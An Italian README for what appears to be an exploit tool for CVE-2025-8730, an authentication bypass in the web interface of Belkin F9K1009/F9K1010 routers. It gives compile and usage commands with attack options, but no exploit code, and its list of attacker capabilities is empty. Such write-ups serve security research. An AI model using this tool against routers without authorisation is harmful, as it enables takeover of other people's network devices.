
Exploit che dimostra una vulnerabilità di bypass dell'autenticazione nell'interfaccia web dei router Belkin F9K1009 e F9K1010.
Autore : Byte Reaper
Questo repository contiene un exploit per CVE‑2025‑8730, una vulnerabilità critica di bypass dell'autenticazione che interessa l'interfaccia web dei router Belkin F9K1009 e F9K1010.
Il difetto risiede nella logica di validazione della sessione del file /login.htm, dove cookie gestiti in modo improprio o richieste appositamente create consentono agli aggressori di aggirare i controlli di accesso e ottenere pieno accesso all'interfaccia amministrativa senza credenziali valide.
Questa vulnerabilità consente ad aggressori remoti (con accesso alla rete) di:
Voce NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-8730
gcc exploit.c argparse.c -o CVE-2025-8730 -lcurl
./CVE-2025-8730 -i 192.168.1.1
Verbose Mode :
./CVE-2025-8730 -i 192.168.1.1 -v -c [cookie file]
Full URl :
./CVE-2025-8730 -f http://<IP>/<LOGIN_FILE>
Sleep (second):
./CVE-2025-8730 -i 192.168.1.1 -s 1
Number Request (For loop), example 10 Request POST :
./CVE-2025-8730 -i 192.168.1.1 -k 10 -s 1 -v
Licenza :
Licenza MIT